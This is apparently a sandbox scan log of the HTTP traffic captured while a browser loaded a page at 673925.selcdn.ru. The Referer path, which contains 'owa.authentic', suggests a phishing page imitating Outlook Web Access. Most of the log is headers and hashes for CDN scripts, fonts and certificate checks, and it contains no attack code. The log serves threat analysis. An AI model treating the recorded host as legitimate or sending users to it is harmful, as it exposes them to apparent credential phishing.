POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 4627 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 20:26:26 GMT Server: ECS (ska/F710) X-Cache: HIT Content-Length: 280 --- Additional Info --- Magic: data Size: 280 Md5: 2b52ad405720d7d4665f40f842db9e99 Sha1: c7e9646a8f2d2d8e932b26d231a518647230e308 Sha256: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330
GET /font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1 Host: stackpath.bootstrapcdn.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: style Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font- (...) FQDN: stackpath.bootstrapcdn.com IP: 104.18.11.207 HASH: 76f15087cfa78c1d7acce66e568815e1df0ca0e7ea5425feb985461c8e1df53f 104.18.11.207 HTTP/2 200 OK content-type: text/css; charset=utf-8 date: Wed, 28 Sep 2022 21:43:33 GMT vary: Accept-Encoding cdn-pullzone: 252412 cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74 cdn-requestcountrycode: DE access-control-allow-origin: * cache-control: public, max-age=31919000 last-modified: Mon, 25 Jan 2021 22:04:55 GMT cdn-cachedat: 11/15/2021 21:49:00 cdn-proxyver: 1.0 cdn-requestpullcode: 200 cdn-requestpullsuccess: True cdn-edgestorageid: 723 cdn-status: 200 timing-allow-origin: * cross-origin-resource-policy: cross-origin x-content-type-options: nosniff cdn-requestid: 2729ae8f2fc6c761bdc17d91cc795f58 cdn-cache: HIT cf-cache-status: HIT age: 9848167 strict-transport-security: max-age=31536000; includeSubDomains; preload server: cloudflare cf-ray: 751fa7c4ac8fb4ed-OSL content-encoding: br alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (30837) Size: 7256 Md5: 4d40bfa30f28c84463bf117e8e0b950a Sha1: 48191396ab49bf0cc865d1fa789dbd49b5d850af Sha256: 76f15087cfa78c1d7acce66e568815e1df0ca0e7ea5425feb985461c8e1df53f
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 1409 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 21:20:04 GMT Server: ECS (ska/F70D) X-Cache: HIT Content-Length: 279 --- Additional Info --- Magic: data Size: 279 Md5: 5f4b013b5656bef604b0022eb233d049 Sha1: 5b5ac71b8dbb5b488d7267d0d70292c2f7651c5b Sha256: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9
GET /ajax/libs/jquery/3.3.1/jquery.min.js HTTP/1.1 Host: ajax.googleapis.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js FQDN: ajax.googleapis.com IP: 142.250.74.74 HASH: 3f59aa77bbbed7760a9968af27d3c19ffddda021c948edf0bf0c0f828dd308ae 142.250.74.74 HTTP/2 200 OK content-type: text/javascript; charset=UTF-8 accept-ranges: bytes vary: Accept-Encoding content-encoding: gzip access-control-allow-origin: * content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers cross-origin-resource-policy: cross-origin cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers" report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]} timing-allow-origin: * content-length: 30399 x-content-type-options: nosniff server: sffe x-xss-protection: 0 date: Sun, 25 Sep 2022 02:36:40 GMT expires: Mon, 25 Sep 2023 02:36:40 GMT cache-control: public, max-age=31536000, stale-while-revalidate=2592000 age: 328013 last-modified: Tue, 03 Mar 2020 19:15:00 GMT alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (65451) Size: 30399 Md5: 0f83cadc148d2ad7e53c91f6c4ee05bb Sha1: 90035c5fffedf4b0f099465f6b929a030b46c92b Sha256: 3f59aa77bbbed7760a9968af27d3c19ffddda021c948edf0bf0c0f828dd308ae
POST /gts1c3 HTTP/1.1 Host: ocsp.pki.goog User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.pki.goog/gts1c3 FQDN: ocsp.pki.goog IP: 142.250.74.3 HASH: 869e09d135cff97a1073e32fa1808d0068195421369d138ad6bba86cfef18091 142.250.74.3 HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Wed, 28 Sep 2022 21:43:33 GMT Cache-Control: public, max-age=14400 Server: ocsp_responder Content-Length: 471 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN --- Additional Info --- Magic: data Size: 471 Md5: 3e9d3eab1fba386c4fdf3af9a757cfa9 Sha1: b50127a1072c95ed71110b07dd58eab72747e6f8 Sha256: 869e09d135cff97a1073e32fa1808d0068195421369d138ad6bba86cfef18091
GET /font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1 Host: stackpath.bootstrapcdn.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: identity Origin: http://673925.selcdn.ru Connection: keep-alive Referer: https://stackpath.bootstrapcdn.com/ Sec-Fetch-Dest: font Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: stackpath.bootstrapcdn.com/font-awesome/4.7.0/fonts/fon (...) FQDN: stackpath.bootstrapcdn.com IP: 104.18.11.207 HASH: 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe 104.18.11.207 HTTP/2 200 OK content-type: font/woff2 date: Wed, 28 Sep 2022 21:43:34 GMT content-length: 77160 cdn-pullzone: 252412 cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74 cdn-requestcountrycode: DE access-control-allow-origin: * cache-control: public, max-age=31919000 etag: "af7ae505a9eed503f8b8e6982036873e" last-modified: Mon, 25 Jan 2021 22:04:55 GMT cdn-cachedat: 08/17/2022 18:20:14 cdn-proxyver: 1.02 cdn-requestpullcode: 200 cdn-requestpullsuccess: True cdn-edgestorageid: 752 timing-allow-origin: * cross-origin-resource-policy: cross-origin x-content-type-options: nosniff cdn-status: 200 cdn-requestid: 943d06907d810327e1d791fc20313da6 cdn-cache: HIT cf-cache-status: HIT age: 429 accept-ranges: bytes vary: Accept-Encoding strict-transport-security: max-age=31536000; includeSubDomains; preload server: cloudflare cf-ray: 751fa7c5994eb50c-OSL alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data Size: 77160 Md5: af7ae505a9eed503f8b8e6982036873e Sha1: d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c Sha256: 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe
GET /favicon.ico HTTP/1.1 Host: 673925.selcdn.ru User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://673925.selcdn.ru/owas444o44/334owa.authentic/new.html/	URL: 673925.selcdn.ru/favicon.ico FQDN: 673925.selcdn.ru IP: 92.53.68.202 HASH: cd08cc3cd7dbd890951754b1e187e2fbe4d68d6a77b2618eb00740a8281c9b56 92.53.68.202 HTTP/1.1 404 Not Found Content-Type: text/html Access-Control-Allow-Origin: * Access-Control-Expose-Headers: X-Backend-Timestamp, Etag, Last-Modified, X-Object-Manifest, X-Timestamp Content-Length: 70 Date: Wed, 28 Sep 2022 21:43:34 GMT Age: 0 --- Additional Info --- Magic: HTML document, ASCII text, with no line terminators Size: 70 Md5: cb75a4a5436bc5f23fd500aed9ab3ad4 Sha1: 270ba1020384007ebcd50e4985b6a3bbe63f194b Sha256: cd08cc3cd7dbd890951754b1e187e2fbe4d68d6a77b2618eb00740a8281c9b56
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/buckets/main/c (...) FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.36 HASH: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300 143.204.55.36 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 329 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff Date: Wed, 28 Sep 2022 21:29:33 GMT Cache-Control: max-age=3600, max-age=3600 Expires: Wed, 28 Sep 2022 22:26:58 GMT ETag: "1648230346554" X-Cache: Hit from cloudfront Via: 1.1 e49f22f18c16784c0f42291e768d1daa.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: oBNEm_X_aymZxwOFdL6NDyn5EO_v7QpO-GI8ctf-md8HmAHmvD70MQ== Age: 841 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (329), with no line terminators Size: 329 Md5: 0333b0655111aa68de771adfcc4db243 Sha1: 63f295a144ac87a7c8e23417626724eeca68a7eb Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 1500 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:34 GMT Last-Modified: Wed, 28 Sep 2022 21:18:34 GMT Server: ECS (ska/F710) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 3526d5ce1381ba26cbc553db057e1915 Sha1: fe01c920696448e8bf12e6fff877bce8281d34a2 Sha256: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: ltGImcsWWOMoeUlJzvDBFw== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	URL: push.services.mozilla.com/ FQDN: push.services.mozilla.com IP: 52.43.61.95 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 52.43.61.95 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: uG70o3UeHtwEcz9LdqFa7lvGH+k= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "6449BF062DBB79683071F367CA142C175EF304485CB4D3711FEB4763146E4FA7" Last-Modified: Wed, 28 Sep 2022 10:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=9142 Expires: Thu, 29 Sep 2022 00:15:58 GMT Date: Wed, 28 Sep 2022 21:43:36 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4364fa358f76c1635458dab5d598f857 Sha1: d15fc7359711b1651235fa1be66accc03fe26c1c Sha256: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "6449BF062DBB79683071F367CA142C175EF304485CB4D3711FEB4763146E4FA7" Last-Modified: Wed, 28 Sep 2022 10:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=9142 Expires: Thu, 29 Sep 2022 00:15:58 GMT Date: Wed, 28 Sep 2022 21:43:36 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4364fa358f76c1635458dab5d598f857 Sha1: d15fc7359711b1651235fa1be66accc03fe26c1c Sha256: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "6449BF062DBB79683071F367CA142C175EF304485CB4D3711FEB4763146E4FA7" Last-Modified: Wed, 28 Sep 2022 10:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=9142 Expires: Thu, 29 Sep 2022 00:15:58 GMT Date: Wed, 28 Sep 2022 21:43:36 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4364fa358f76c1635458dab5d598f857 Sha1: d15fc7359711b1651235fa1be66accc03fe26c1c Sha256: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "6449BF062DBB79683071F367CA142C175EF304485CB4D3711FEB4763146E4FA7" Last-Modified: Wed, 28 Sep 2022 10:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=9142 Expires: Thu, 29 Sep 2022 00:15:58 GMT Date: Wed, 28 Sep 2022 21:43:36 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4364fa358f76c1635458dab5d598f857 Sha1: d15fc7359711b1651235fa1be66accc03fe26c1c Sha256: 6449bf062dbb79683071f367ca142c175ef304485cb4d3711feb4763146e4fa7
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb9a3b058-92c9-490e-9cbb-736f7e46510d.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 8fcff053ce6e5750136bf876bad5b2916935f13ea039912d977928b086f0a48b 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 7455 x-amzn-requestid: e99c9f33-b72a-4070-80cf-06fb4a87d1df x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZG4S6EcAoAMFX1A= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6332a0df-04122b4a345dbc3f3918af98;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 07:06:07 GMT x-amz-cf-pop: SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: Di1kDUlYEc1rv31fHM-OquU_W_LggEzDCTVME5iFJ5KffZcQyN6i2A== via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 07:31:39 GMT age: 51117 etag: "b383135e2ebc23fe80eb0d594b198cb8c89327a5" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 7455 Md5: ea3890e460356d6ecc3ba4e405ac2e9e Sha1: b383135e2ebc23fe80eb0d594b198cb8c89327a5 Sha256: 8fcff053ce6e5750136bf876bad5b2916935f13ea039912d977928b086f0a48b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0369629e-f44d-439f-a279-b5ae6ecc0cf1.png HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 82935e52aa59929a448d17a5a2d58fda86bb5c25bf6628a05bd904f82517dada 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 14464 x-amzn-requestid: 6627e07e-034b-432e-ab9e-afe035fa0b9a x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZI3e9HgIoAMFxUA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63336c5f-7f34c3f6454379724a7ac413;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 21:34:23 GMT x-amz-cf-pop: SEA73-P1 x-cache: Miss from cloudfront x-amz-cf-id: J27vcANRhkMUuGwTZjXkO0EF0-UjN-MODVQRKgsc7hJI2S-UPF8Ctw== via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:40:55 GMT age: 161 etag: "bc214d60be395d4cf753216ff8f9691c33d25e75" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 14464 Md5: aa5cad224dbddd71881bd07255beb4da Sha1: bc214d60be395d4cf753216ff8f9691c33d25e75 Sha256: 82935e52aa59929a448d17a5a2d58fda86bb5c25bf6628a05bd904f82517dada
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fad593ee0-d404-46e3-b129-229e09b263b0.png HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 6a207f75eb3951f3dea5252bc8d185cd604d3d657f15b838774e8087e91f37f5 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 12016 x-amzn-requestid: ec1b3715-5d0f-4045-aa5b-b70a55c81d72 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZI3e3EtyIAMFdZg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63336c5e-201dd1ef1426a09965c68dab;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 21:34:22 GMT x-amz-cf-pop: HIO50-C1, SEA73-P1 x-cache: Miss from cloudfront x-amz-cf-id: y3DefdcXJyoDHpJXwz460gfWcv2JUboOFExNQmTFgy30B4mn54Xvuw== via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google date: Tue, 27 Sep 2022 21:44:30 GMT age: 86346 etag: "a54803cca7d3c509c195f65961e1110c8ec56f55" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 12016 Md5: 4b794c6812cb546de0295e087ebe66a7 Sha1: a54803cca7d3c509c195f65961e1110c8ec56f55 Sha256: 6a207f75eb3951f3dea5252bc8d185cd604d3d657f15b838774e8087e91f37f5
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F693de74c-173e-4d9b-8317-35601f30ffd7.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: a3d0729e1d43afeadd2dd8273c858b8839d9e476f773c8ec9d96b5969a9e0b4a 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 13299 x-amzn-requestid: 926df8b6-beec-470d-b0b3-33be326cd379 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZI3UPF8YIAMF3Nw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63336c1a-343e91e735af43d01fc83ddd;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 21:33:14 GMT x-amz-cf-pop: HIO50-C1, SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: KmVkKXoPqZmnwFtpKhuox1kJNDoSxMEmYE39_zVPyaeoU4sPqq-_wA== via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google date: Tue, 27 Sep 2022 21:44:23 GMT age: 86353 etag: "651600f2ef18cecc2e38370069bbb5e1d86f68e0" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 13299 Md5: ad84ed0c5b2090df7996007514cf1984 Sha1: 651600f2ef18cecc2e38370069bbb5e1d86f68e0 Sha256: a3d0729e1d43afeadd2dd8273c858b8839d9e476f773c8ec9d96b5969a9e0b4a
